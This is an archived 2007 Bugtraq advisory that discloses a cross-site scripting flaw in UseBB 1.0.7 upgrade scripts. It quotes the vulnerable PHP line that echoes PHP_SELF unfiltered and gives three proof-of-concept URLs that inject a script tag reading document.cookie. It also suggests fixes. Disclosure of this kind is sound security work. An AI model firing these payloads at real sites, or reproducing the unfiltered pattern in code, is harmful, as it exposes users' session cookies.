lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070720195436.27206.qmail@securityfocus.com>
Date: 20 Jul 2007 19:54:36 -0000
From: s4mi@...uxMail.org
To: bugtraq@...urityfocus.com
Subject: UseBB 1.0.x  Cross Site Scripting (XSS)

#############################################################
#	Script...............: UseBB version: 1.0.7	    #
#	Script Site..........: http://www.usebb.net	    #
#	Vulnerability........: Cross Site Scripting (XSS)   #
#	Acces................: Remote			    #
#	level................: Dangerous		    #
#	Author...............: S4mi			    #
#	Contact..............: s4mi[at]LinuxMail.org	    #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" 
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step 
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

Solution :
====================

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ